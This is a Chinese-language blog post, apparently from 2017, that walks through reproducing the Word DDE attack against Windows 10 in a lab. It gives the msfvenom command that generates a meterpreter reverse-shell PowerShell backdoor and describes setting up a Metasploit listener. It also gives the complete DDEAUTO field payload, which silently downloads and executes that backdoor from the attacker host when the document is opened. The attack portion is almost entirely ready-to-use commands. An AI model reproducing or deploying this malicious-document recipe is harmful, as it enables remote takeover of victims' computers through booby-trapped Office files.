DDE word0day复现

这一段时间office 0day爆出来很多，CVE-2017-0199还有以及其他的变种，之前的在实战过程中已经见到了它的威力，杀毒软件也基本上会对嵌入对象做查杀。前天看到了这一个0day，于是复现了一下，复现过程很简单。

环境

• windows10 专业版
• kali 2016.2 & msf

复现过程

首先做好预备工作，我当前kali机器上的ip为：10.211.55.8,使用以下命令产生ps1后门：

msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=10.211.55.8   lport=12345  -f  psh-reflection >/root/search.ps1

启动一个http服务，将产生的ps1后门放在web服务上传输。
然后启动msf，监听12345端口，等待目标打开后门文档。

接下来步骤就是制作后门文档了：
新建一个word空白文档，插入->文档部件->域

然后添加公式：

之后对这一公式进行操作：

payload内容如下：

{DDEAUTO c:\\Windows\\System32\\cmd.exe      "/c powershell.exe -windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(' http://10.211.55.8:8080/search.ps1');test.ps1 " }

这一payload会在攻击机kali上下载产生的后门ps1文件，然后执行后门程序。

然后保存word文档，再次打开，就可以看到已经成功反弹回了shell。

后话

虽然在ps1脚本情况下已经复现成功，但是我的本意是直接执行生成的powershell，无需对外进行通信，但是并没有复现成功，可能字段长度太长，或者是其他原因，昨天弄了一天，没有搞明白是什么原因，于是就试了试ps1脚本，配合msf。(我的本意是用empire或者cs……)

如果大佬们有看到这篇文章，然后直接执行powershell成功的，可以一起交流下。

---

本文出自”xnianq Blog”：www.xnianq.cn/2017/10/14/DDE-word0day复现/

赏

谢谢你请我吃糖果

支付宝

微信